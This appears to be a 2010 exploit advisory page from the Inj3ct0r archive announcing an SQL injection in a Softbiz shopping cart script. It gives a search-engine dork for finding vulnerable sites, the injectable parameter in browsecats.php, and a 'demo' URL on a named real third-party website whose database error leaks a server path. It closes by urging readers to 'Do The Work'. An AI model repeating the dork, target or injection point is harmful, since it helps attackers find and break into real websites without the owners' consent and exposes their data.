<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Shopping Cart Script SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Shopping Cart Script SQL Injection Vulnerability
================================================

####################################
[+] Title: Shopping Cart Script SQL Injection Vulnerability
[+] Date: 8.6.2010
[+] Author: ThEtA.Nu
[+] Software Link: http://www.softbizscripts.com / payoptions.php?pid=23&amp;pamount=115&amp;pname=Softbiz%20Shopping%20Cart%20Script
[+] Tested Windows 7 , Windows Xp
[+] Where : From Remote
####################################
[~] Founded by ThEtA.Nu
[~] Team: Kosova Hacker Security
[~] Contact: theta.nu[at]windowslive[dot]com
[~] Home: http:///www.albanian-legends.com / www.khs-cr3w.net

#####ExPl0iT3d by ThEtA.Nu######

[~] DORK: &quot;inurl:&quot;browsecats.php?cid=&quot;&quot;

####################################

[~]ExPl0iT : http://127.0.0.1 / browsecats.php?cid=[SQL-injection]

[~]Dem0: http://resumesjharkhand.com / browsecats.php?cid=33′ &lt;= Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/s/e/o/seoidol4212/html/browsecats.php on line 7

This Is VulnReaBle &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Do The Work :P

####################################
[!]Kosova Hacker Security
####################################
[!]Kosova HAcker Security
####################################
[!]Greetz To : Th3 Dir3Ctor
####################################
[!]Proud 2 b3:Albanian &amp; Muslim
####################################

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-08]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13241